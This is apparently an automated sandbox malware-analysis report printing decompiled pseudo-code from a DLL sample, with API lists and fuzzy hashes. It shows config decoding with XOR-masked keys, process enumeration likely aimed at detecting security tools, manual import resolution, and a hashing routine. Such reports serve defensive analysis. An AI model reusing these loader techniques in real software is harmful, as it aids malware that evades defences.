                    • Instruction ID: ef4b4919c3c422ec7cbb0f83580b5df2040b3f31f18ce0547ca8ff22862e5c4b
                    • Opcode Fuzzy Hash: a0c5dc9ef026d92495ad760142d2ae3100b38f27bfcaaf1c4d0c3c5834478f99
                    • Instruction Fuzzy Hash: 29F03A36100109BACB12AF59DC00CEF3FADEF94A60B00802AFE98DA110DA32D655DFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E010C56CF(intOrPtr* __edi) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				intOrPtr _t15;
                    				intOrPtr* _t21;
                    
                    				_t21 = __edi;
                    				_push( &_v12);
                    				_push(__edi);
                    				_v8 = 0x1d4c0;
                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                    				while(1) {
                    					_v16 = _t15;
                    					Sleep(0x1f4); // executed
                    					if(_v12 == 4) {
                    						break;
                    					}
                    					if(_v8 == 0) {
                    						L4:
                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                    						continue;
                    					} else {
                    						if(_v8 <= 0x1f4) {
                    							_v16 = 0x80004004;
                    						} else {
                    							_v8 = _v8 - 0x1f4;
                    							goto L4;
                    						}
                    					}
                    					L8:
                    					return _v16;
                    				}
                    				goto L8;
                    			}









                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 9eab5c6cfdf39a5d0115c81bb30c106e9a193c59df8dad6bcb69c5f32bdb8bb0
                    • Instruction ID: 3ddf758123d8dfedfb1ad42db9e10479d57c408aaa122f62496070d1204955ed
                    • Opcode Fuzzy Hash: 9eab5c6cfdf39a5d0115c81bb30c106e9a193c59df8dad6bcb69c5f32bdb8bb0
                    • Instruction Fuzzy Hash: 79F0C979D01218EFDB10DB98E888AEDB7B8FF45645F1081AAE542A3241D3746A84CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C4DC8(void* __edi, void* _a4) {
                    				int _t7;
                    				int _t12;
                    
                    				_t7 = E010C607D(__edi, _a4,  &_a4); // executed
                    				_t12 = _t7;
                    				if(_t12 != 0) {
                    					memcpy(__edi, _a4, _t12);
                    					 *((char*)(__edi + _t12)) = 0;
                    					E010C17AB(_a4);
                    				}
                    				return _t12;
                    			}






                    APIs
                      • Part of subcall function 010C607D: memcpy.NTDLL(00000000,00000110,?,?,?,?,010C4DD9,?,010C3AC6,010C3AC6,?), ref: 010C60B3
                      • Part of subcall function 010C607D: memset.NTDLL ref: 010C6128
                      • Part of subcall function 010C607D: memset.NTDLL ref: 010C613C
                    • memcpy.NTDLL(?,010C3AC6,00000000,?,010C3AC6,010C3AC6,?,?,010C3AC6,?), ref: 010C4DE4
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memcpymemset$FreeHeap
                    • String ID:
                    • API String ID: 3053036209-0
                    • Opcode ID: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction ID: 9ae4912a78b9beb16a99c5fa0a55b55f6d4874f3d021223aad2f8d7b9fafc510
                    • Opcode Fuzzy Hash: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction Fuzzy Hash: 7CE0867650011AB7C7123B94DC00DEF7FBCDF61991F004018FE4996200D632D5509BE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E010C4EF3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                    				int _v8;
                    				void* _v12;
                    				void* _v16;
                    				signed int _t28;
                    				signed int _t33;
                    				signed int _t39;
                    				char* _t45;
                    				char* _t46;
                    				char* _t47;
                    				char* _t48;
                    				char* _t49;
                    				char* _t50;
                    				void* _t51;
                    				void* _t52;
                    				void* _t53;
                    				intOrPtr _t54;
                    				void* _t56;
                    				intOrPtr _t57;
                    				intOrPtr _t58;
                    				signed int _t61;
                    				intOrPtr _t64;
                    				signed int _t65;
                    				signed int _t70;
                    				void* _t72;
                    				void* _t73;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t82;
                    				signed int _t86;
                    				signed int _t90;
                    				signed int _t94;
                    				signed int _t98;
                    				void* _t101;
                    				void* _t102;
                    				void* _t115;
                    				void* _t118;
                    				intOrPtr _t121;
                    
                    				_t118 = __esi;
                    				_t115 = __edi;
                    				_t104 = __ecx;
                    				_t101 = __ebx;
                    				_t28 =  *0x10ca31c; // 0x69b25f44
                    				if(E010C4451( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                    					 *0x10ca374 = _v8;
                    				}
                    				_t33 =  *0x10ca31c; // 0x69b25f44
                    				if(E010C4451( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                    					_v12 = 2;
                    					L69:
                    					return _v12;
                    				}
                    				_t39 =  *0x10ca31c; // 0x69b25f44
                    				_push(_t115);
                    				if(E010C4451( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                    					L67:
                    					HeapFree( *0x10ca2d8, 0, _v16);
                    					goto L69;
                    				} else {
                    					_push(_t101);
                    					_t102 = _v12;
                    					if(_t102 == 0) {
                    						_t45 = 0;
                    					} else {
                    						_t98 =  *0x10ca31c; // 0x69b25f44
                    						_t45 = E010C572F(_t104, _t102, _t98 ^ 0x7895433b);
                    					}
                    					_push(_t118);
                    					if(_t45 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                    							 *0x10ca2e0 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t46 = 0;
                    					} else {
                    						_t94 =  *0x10ca31c; // 0x69b25f44
                    						_t46 = E010C572F(_t104, _t102, _t94 ^ 0x219b08c7);
                    					}
                    					if(_t46 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                    							 *0x10ca2e4 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t47 = 0;
                    					} else {
                    						_t90 =  *0x10ca31c; // 0x69b25f44
                    						_t47 = E010C572F(_t104, _t102, _t90 ^ 0x31fc0661);
                    					}
                    					if(_t47 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                    							 *0x10ca2e8 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t48 = 0;
                    					} else {
                    						_t86 =  *0x10ca31c; // 0x69b25f44
                    						_t48 = E010C572F(_t104, _t102, _t86 ^ 0x0cd926ce);
                    					}
                    					if(_t48 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                    							 *0x10ca004 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t49 = 0;
                    					} else {
                    						_t82 =  *0x10ca31c; // 0x69b25f44
                    						_t49 = E010C572F(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                    					}
                    					if(_t49 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                    							 *0x10ca02c = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t50 = 0;
                    					} else {
                    						_t78 =  *0x10ca31c; // 0x69b25f44
                    						_t50 = E010C572F(_t104, _t102, _t78 ^ 0x2878b929);
                    					}
                    					if(_t50 == 0) {
                    						L41:
                    						 *0x10ca2ec = 5;
                    						goto L42;
                    					} else {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                    							goto L41;
                    						} else {
                    							L42:
                    							if(_t102 == 0) {
                    								_t51 = 0;
                    							} else {
                    								_t75 =  *0x10ca31c; // 0x69b25f44
                    								_t51 = E010C572F(_t104, _t102, _t75 ^ 0x261a367a);
                    							}
                    							if(_t51 != 0) {
                    								_push(_t51);
                    								_t72 = 0x10;
                    								_t73 = E010C1760(_t72);
                    								if(_t73 != 0) {
                    									_push(_t73);
                    									E010C4DFF();
                    								}
                    							}
                    							if(_t102 == 0) {
                    								_t52 = 0;
                    							} else {
                    								_t70 =  *0x10ca31c; // 0x69b25f44
                    								_t52 = E010C572F(_t104, _t102, _t70 ^ 0xb9d404b2);
                    							}
                    							if(_t52 != 0 && E010C1760(0, _t52) != 0) {
                    								_t121 =  *0x10ca3cc; // 0x37a95b0
                    								E010C1000(_t121 + 4, _t68);
                    							}
                    							if(_t102 == 0) {
                    								_t53 = 0;
                    							} else {
                    								_t65 =  *0x10ca31c; // 0x69b25f44
                    								_t53 = E010C572F(_t104, _t102, _t65 ^ 0x3df17130);
                    							}
                    							if(_t53 == 0) {
                    								L59:
                    								_t54 =  *0x10ca320; // 0x26dd5a8
                    								_t22 = _t54 + 0x10cb252; // 0x616d692f
                    								 *0x10ca370 = _t22;
                    								goto L60;
                    							} else {
                    								_t64 = E010C1760(0, _t53);
                    								 *0x10ca370 = _t64;
                    								if(_t64 != 0) {
                    									L60:
                    									if(_t102 == 0) {
                    										_t56 = 0;
                    									} else {
                    										_t61 =  *0x10ca31c; // 0x69b25f44
                    										_t56 = E010C572F(_t104, _t102, _t61 ^ 0xd2079859);
                    									}
                    									if(_t56 == 0) {
                    										_t57 =  *0x10ca320; // 0x26dd5a8
                    										_t23 = _t57 + 0x10cb791; // 0x6976612e
                    										_t58 = _t23;
                    									} else {
                    										_t58 = E010C1760(0, _t56);
                    									}
                    									 *0x10ca3e0 = _t58;
                    									HeapFree( *0x10ca2d8, 0, _t102);
                    									_v12 = 0;
                    									goto L67;
                    								}
                    								goto L59;
                    							}
                    						}
                    					}
                    				}
                    			}









































                    APIs
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C4F98
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C4FCA
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C4FFC
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C502E
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C5060
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C5092
                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010C5191
                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010C51A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 7e1d48b9055c5939c1d9083e86fa3684de5ee74f217ef185cff59a1af80a20c1
                    • Instruction ID: cf5c2abaa454687a58e5def805ef14d75cdda8667ea599ba6f94cdfd1807ec78
                    • Opcode Fuzzy Hash: 7e1d48b9055c5939c1d9083e86fa3684de5ee74f217ef185cff59a1af80a20c1
                    • Instruction Fuzzy Hash: 1581A574B00219EFDB60DBB8DC98D9F7BE9BB88A40B344959B581D3104FA7AE9418F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E010C2AB4() {
                    				char _v264;
                    				void* _v300;
                    				int _t8;
                    				intOrPtr _t9;
                    				int _t15;
                    				void* _t17;
                    
                    				_t15 = 0;
                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                    				if(_t17 != 0) {
                    					_t8 = Process32First(_t17,  &_v300);
                    					while(_t8 != 0) {
                    						_t9 =  *0x10ca320; // 0x26dd5a8
                    						_t2 = _t9 + 0x10cbea8; // 0x73617661
                    						_push( &_v264);
                    						if( *0x10ca110() != 0) {
                    							_t15 = 1;
                    						} else {
                    							_t8 = Process32Next(_t17,  &_v300);
                    							continue;
                    						}
                    						L7:
                    						CloseHandle(_t17);
                    						goto L8;
                    					}
                    					goto L7;
                    				}
                    				L8:
                    				return _t15;
                    			}










                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010C2AC4
                    • Process32First.KERNEL32(00000000,?), ref: 010C2AD7
                    • Process32Next.KERNEL32(00000000,?), ref: 010C2B03
                    • CloseHandle.KERNEL32(00000000), ref: 010C2B12
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: ed7fe559f6087949bdd44a054bf633820f64c2c8841e4ed50aa22cd1ea9405bb
                    • Instruction ID: 6b70388d2704110437255a7809e7f17f88e77b6d6602a43c2603f2254e01dd55
                    • Opcode Fuzzy Hash: ed7fe559f6087949bdd44a054bf633820f64c2c8841e4ed50aa22cd1ea9405bb
                    • Instruction Fuzzy Hash: 80F0BB726001296FD731AB29CC49DEF37ACEBC5B10F0000E9FAD5D3000EA24D9468FA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E1000169C() {
                    				void* _t1;
                    				long _t3;
                    				void* _t4;
                    				long _t5;
                    				void* _t6;
                    				intOrPtr _t8;
                    				void* _t12;
                    
                    				_t8 =  *0x100041b0;
                    				_t1 = CreateEventA(0, 1, 0, 0);
                    				 *0x100041bc = _t1;
                    				if(_t1 == 0) {
                    					return GetLastError();
                    				}
                    				_t3 = GetVersion();
                    				if(_t3 != 5) {
                    					L4:
                    					if(_t12 <= 0) {
                    						_t4 = 0x32;
                    						return _t4;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					if(_t3 > 0) {
                    						L5:
                    						 *0x100041ac = _t3;
                    						_t5 = GetCurrentProcessId();
                    						 *0x100041a8 = _t5;
                    						 *0x100041b0 = _t8;
                    						_t6 = OpenProcess(0x10047a, 0, _t5);
                    						 *0x100041a4 = _t6;
                    						if(_t6 == 0) {
                    							 *0x100041a4 =  *0x100041a4 | 0xffffffff;
                    						}
                    						return 0;
                    					} else {
                    						_t12 = _t3 - _t3;
                    						goto L4;
                    					}
                    				}
                    			}

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001082), ref: 100016AB
                    • GetVersion.KERNEL32 ref: 100016BA
                    • GetCurrentProcessId.KERNEL32 ref: 100016D1
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 100016EA
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentEventOpenVersion
                    • String ID:
                    • API String ID: 845504543-0
                    • Opcode ID: 91fb625a8f9509fb00be4d021992df405f1d53defdd73eea256b4d4a3827a3f9
                    • Instruction ID: 68b7ec8200611ed460befc8ec23b9cf59c5310516807f67d0faef169e7c69390
                    • Opcode Fuzzy Hash: 91fb625a8f9509fb00be4d021992df405f1d53defdd73eea256b4d4a3827a3f9
                    • Instruction Fuzzy Hash: 25F062B068A3309EF751DF68AC897C23BE8E7197D1F068015E644C61FCD7B044918B99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E10001BE8(void* __edi, intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				_Unknown_base(*)()** _v16;
                    				signed int _v20;
                    				signed short _v24;
                    				struct HINSTANCE__* _v28;
                    				intOrPtr _t43;
                    				intOrPtr* _t45;
                    				intOrPtr _t46;
                    				struct HINSTANCE__* _t47;
                    				intOrPtr* _t49;
                    				intOrPtr _t50;
                    				signed short _t51;
                    				_Unknown_base(*)()* _t53;
                    				CHAR* _t54;
                    				_Unknown_base(*)()* _t55;
                    				void* _t58;
                    				signed int _t59;
                    				_Unknown_base(*)()* _t60;
                    				intOrPtr _t61;
                    				intOrPtr _t65;
                    				signed int _t68;
                    				void* _t69;
                    				CHAR* _t71;
                    				signed short* _t73;
                    
                    				_t69 = __edi;
                    				_v20 = _v20 & 0x00000000;
                    				_t59 =  *0x100041cc;
                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                    				if(_t43 != 0) {
                    					_t45 = _t43 + __edi;
                    					_v12 = _t45;
                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                    					if(_t46 != 0) {
                    						while(1) {
                    							_t71 = _t46 + _t69;
                    							_t47 = LoadLibraryA(_t71);
                    							_v28 = _t47;
                    							if(_t47 == 0) {
                    								break;
                    							}
                    							_v24 = _v24 & 0x00000000;
                    							 *_t71 = _t59 - 0x69b25f44;
                    							_t49 = _v12;
                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                    							_t50 =  *_t49;
                    							if(_t50 != 0) {
                    								L6:
                    								_t73 = _t50 + _t69;
                    								_v16 = _t61 + _t69;
                    								while(1) {
                    									_t51 =  *_t73;
                    									if(_t51 == 0) {
                    										break;
                    									}
                    									if(__eflags < 0) {
                    										__eflags = _t51 - _t69;
                    										if(_t51 < _t69) {
                    											L12:
                    											_t21 =  &_v8;
                    											 *_t21 = _v8 & 0x00000000;
                    											__eflags =  *_t21;
                    											_v24 =  *_t73 & 0x0000ffff;
                    										} else {
                    											_t65 = _a4;
                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                    												goto L12;
                    											} else {
                    												goto L11;
                    											}
                    										}
                    									} else {
                    										_t51 = _t51 + _t69;
                    										L11:
                    										_v8 = _t51;
                    									}
                    									_t53 = _v8;
                    									__eflags = _t53;
                    									if(_t53 == 0) {
                    										_t54 = _v24 & 0x0000ffff;
                    									} else {
                    										_t54 = _t53 + 2;
                    									}
                    									_t55 = GetProcAddress(_v28, _t54);
                    									__eflags = _t55;
                    									if(__eflags == 0) {
                    										_v20 = _t59 - 0x69b25ec5;
                    									} else {
                    										_t68 = _v8;
                    										__eflags = _t68;
                    										if(_t68 != 0) {
                    											 *_t68 = _t59 - 0x69b25f44;
                    										}
                    										 *_v16 = _t55;
                    										_t58 = 0x593682f4 + _t59 * 4;
                    										_t73 = _t73 + _t58;
                    										_t32 =  &_v16;
                    										 *_t32 = _v16 + _t58;
                    										__eflags =  *_t32;
                    										continue;
                    									}
                    									goto L23;
                    								}
                    							} else {
                    								_t50 = _t61;
                    								if(_t61 != 0) {
                    									goto L6;
                    								}
                    							}
                    							L23:
                    							_v12 = _v12 + 0x14;
                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                    							if(_t46 != 0) {
                    								continue;
                    							} else {
                    							}
                    							L26:
                    							goto L27;
                    						}
                    						_t60 = _t59 + 0x964da13a;
                    						__eflags = _t60;
                    						_v20 = _t60;
                    						goto L26;
                    					}
                    				}
                    				L27:
                    				return _v20;
                    			}

                    APIs
                    • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 10001C20
                    • GetProcAddress.KERNEL32(?,00000000), ref: 10001C92
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID:
                    • API String ID: 2574300362-0
                    • Opcode ID: 8be51d2265ce6978ffd525ccecd7ea59ab7f198a23a8f22c3242a6123d44775f
                    • Instruction ID: 9a558a10c842885ef377bdf559df42a0ff7ab32311e040cca193c1bec9e7486c
                    • Opcode Fuzzy Hash: 8be51d2265ce6978ffd525ccecd7ea59ab7f198a23a8f22c3242a6123d44775f
                    • Instruction Fuzzy Hash: 1E311971A4121ADFFB54CF99C890AEEB7F9FF04284B21456DD805EB258E770EA40CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E010C6C62(void* __ecx, intOrPtr* _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				intOrPtr _v44;
                    				intOrPtr _v48;
                    				intOrPtr _v52;
                    				intOrPtr _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				intOrPtr _v68;
                    				intOrPtr _v72;
                    				void _v76;
                    				intOrPtr* _t226;
                    				signed int _t229;
                    				signed int _t231;
                    				signed int _t233;
                    				signed int _t235;
                    				signed int _t237;
                    				signed int _t239;
                    				signed int _t241;
                    				signed int _t243;
                    				signed int _t245;
                    				signed int _t247;
                    				signed int _t249;
                    				signed int _t251;
                    				signed int _t253;
                    				signed int _t255;
                    				signed int _t257;
                    				signed int _t259;
                    				signed int _t274;
                    				signed int _t337;
                    				void* _t347;
                    				signed int _t348;
                    				signed int _t350;
                    				signed int _t352;
                    				signed int _t354;
                    				signed int _t356;
                    				signed int _t358;
                    				signed int _t360;
                    				signed int _t362;
                    				signed int _t364;
                    				signed int _t366;
                    				signed int _t375;
                    				signed int _t377;
                    				signed int _t379;
                    				signed int _t381;
                    				signed int _t383;
                    				intOrPtr* _t399;
                    				signed int _t407;
                    				signed int _t409;
                    				signed int _t411;
                    				signed int _t413;
                    				signed int _t415;
                    				signed int _t417;
                    				signed int _t419;
                    				signed int _t421;
                    				signed int _t423;
                    				signed int _t425;
                    				signed int _t427;
                    				signed int _t429;
                    				signed int _t437;
                    				signed int _t439;
                    				signed int _t441;
                    				signed int _t443;
                    				signed int _t445;
                    				void* _t447;
                    				signed int _t507;
                    				signed int _t598;
                    				signed int _t606;
                    				signed int _t612;
                    				signed int _t678;
                    				signed int* _t681;
                    				signed int _t682;
                    				signed int _t684;
                    				signed int _t689;
                    				signed int _t691;
                    				signed int _t696;
                    				signed int _t698;
                    				signed int _t717;
                    				signed int _t719;
                    				signed int _t721;
                    				signed int _t723;
                    				signed int _t725;
                    				signed int _t727;
                    				signed int _t733;
                    				signed int _t739;
                    				signed int _t741;
                    				signed int _t743;
                    				signed int _t745;
                    				signed int _t747;
                    
                    				_t226 = _a4;
                    				_t347 = __ecx + 2;
                    				_t681 =  &_v76;
                    				_t447 = 0x10;
                    				do {
                    					_t274 =  *(_t347 - 1) & 0x000000ff;
                    					_t347 = _t347 + 4;
                    					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                    					_t681 =  &(_t681[1]);
                    					_t447 = _t447 - 1;
                    				} while (_t447 != 0);
                    				_t6 = _t226 + 4; // 0x14eb3fc3
                    				_t682 =  *_t6;
                    				_t7 = _t226 + 8; // 0x8d08458b
                    				_t407 =  *_t7;
                    				_t8 = _t226 + 0xc; // 0x56c1184c
                    				_t348 =  *_t8;
                    				asm("rol eax, 0x7");
                    				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                    				asm("rol ecx, 0xc");
                    				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                    				asm("ror edx, 0xf");
                    				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                    				asm("ror esi, 0xa");
                    				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                    				_v8 = _t684;
                    				_t689 = _v8;
                    				asm("rol eax, 0x7");
                    				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                    				asm("rol ecx, 0xc");
                    				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                    				asm("ror edx, 0xf");
                    				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                    				asm("ror esi, 0xa");
                    				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                    				_v8 = _t691;
                    				_t696 = _v8;
                    				asm("rol eax, 0x7");
                    				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                    				asm("rol ecx, 0xc");
                    				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                    				asm("ror edx, 0xf");
                    				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                    				asm("ror esi, 0xa");
                    				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                    				_v8 = _t698;
                    				asm("rol eax, 0x7");
                    				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                    				asm("rol ecx, 0xc");
                    				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                    				_t507 =  !_t356;
                    				asm("ror edx, 0xf");
                    				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                    				_v12 = _t415;
                    				_v12 =  !_v12;
                    				asm("ror esi, 0xa");
                    				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                    				asm("rol eax, 0x5");
                    				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                    				asm("rol ecx, 0x9");
                    				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                    				asm("rol edx, 0xe");
                    				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                    				asm("ror esi, 0xc");
                    				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                    				asm("rol eax, 0x5");
                    				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                    				asm("rol ecx, 0x9");
                    				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                    				asm("rol edx, 0xe");
                    				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                    				asm("ror esi, 0xc");
                    				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                    				asm("rol eax, 0x5");
                    				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                    				asm("rol ecx, 0x9");
                    				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
